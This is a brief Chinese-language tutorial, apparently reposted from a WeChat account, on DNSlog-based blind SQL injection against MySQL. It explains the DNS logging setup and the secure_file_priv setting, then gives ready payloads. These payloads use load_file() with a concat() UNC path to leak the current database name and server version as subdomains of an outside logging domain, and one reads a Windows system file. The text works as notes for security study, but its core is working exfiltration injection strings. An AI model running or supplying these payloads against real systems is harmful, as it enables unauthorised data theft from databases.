DNSlog注入笔记

原理

首先需要有一个可以配置的域名，比如：gwsg7.l.dnslog.io，然后通过代理商设置域名 gwsg7.l.dnslog.io 的 nameserver 为自己的服务器 A，然后再服务器 A 上配置好 DNS Server，这样以来所有 gwsg7.l.dnslog.io 及其子域名的查询都会到 服务器 A 上，这时就能够实时地监控域名查询请求了

https://dnslog.io/ 这是一个免费的记录dnslog的平台，访问后会给你一个临时的三级域名：xxx.l.dnslog.io 当我们把注入信息放到四级域名那里，日志会记录下来。

load_file

通过DNSlog盲注需要用到load_file()函数。show variables like '%secure%' 查看load_file()可以读取的磁盘。

1、当secure_file_priv为空，就可以读取磁盘的目录。
2、当secure_file_priv为G:，就可以读取G盘的文件。
3、当secure_file_priv为null，load_file就不能加载文件。

在5.7.6之后默认为null,可以自己去my.ini里[mysqld]的添加

尝试读取文件

select load_file('C:\Windows\win.ini');

Sql注入

use mysql;select load_file(concat('\\\\',(select database()),'.yoz1k.l.dnslog.io\abc'));

成功获取

获取数据库版本

select load_file(concat('\\\\',(select version()),'.yoz1k.l.dnslog.io\abc'));

原文始发于微信公众号（Mo60）：DNSlog注入笔记